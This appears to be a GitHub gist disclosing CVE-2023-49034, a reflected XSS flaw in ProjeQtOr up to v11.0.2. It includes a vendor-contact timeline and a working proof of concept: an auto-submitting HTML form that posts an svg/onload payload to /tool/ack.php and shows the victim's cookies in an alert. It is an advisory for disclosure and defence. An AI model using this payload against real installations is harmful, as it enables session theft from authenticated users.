Skip to content

Instantly share code, notes, and snippets.

@thedroidgeek

thedroidgeek/CVE-2023-49034.md

Created February 6, 2024 08:49
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save thedroidgeek/0a9b8189b74f968b5d7b84ec12b8f8f5 to your computer and use it in GitHub Desktop.
Save thedroidgeek/0a9b8189b74f968b5d7b84ec12b8f8f5 to your computer and use it in GitHub Desktop.
Download ZIP
Public reference for CVE-2023-49034
Raw
CVE-2023-49034.md

CVE-2023-49034

Description

A reflected XSS vulnerability via a POST request to /tool/ack.php affecting all ProjectOr versions up to v11.0.2 (unpatched)

Additional Information

It was possible to bypass the very basic and incomplete security measure (detection of the <script> tag) that exists in the checkValidHtmlText() function of the /model/Security.php file of the solution.

Timeline

  • 30-10-2023: Vulnerability identified during a client pentest
  • 07-11-2023: 1st vendor contact attempt via website form
  • 17-11-2023: CVE requested
  • 19-11-2023: 2nd vendor contact attempt via email
  • 24-11-2023: CVE assigned
  • 10-01-2024: 3rd vendor contact attempt via support forum
  • 06-02-2024: Public disclosure requested

Proof of Concept

Create an HTML file with the following auto-submitting form:

<html>
  <body>
    <form action="https://demo.projeqtor.org/tool/ack.php" method="POST">
      <input type="hidden" name="resultAck" value="&lt;svg/onload=alert(document.cookie)&gt;" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Opening the file (on an authenticated session) will send the POST request that injects and executes the PoC Javascript code (printing cookies in an alert).

Vulnerability Type

Cross Site Scripting (XSS)

Vendor of Product

ProjeQtOr

Affected Component

/tool/ack.php, /model/Security.php

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment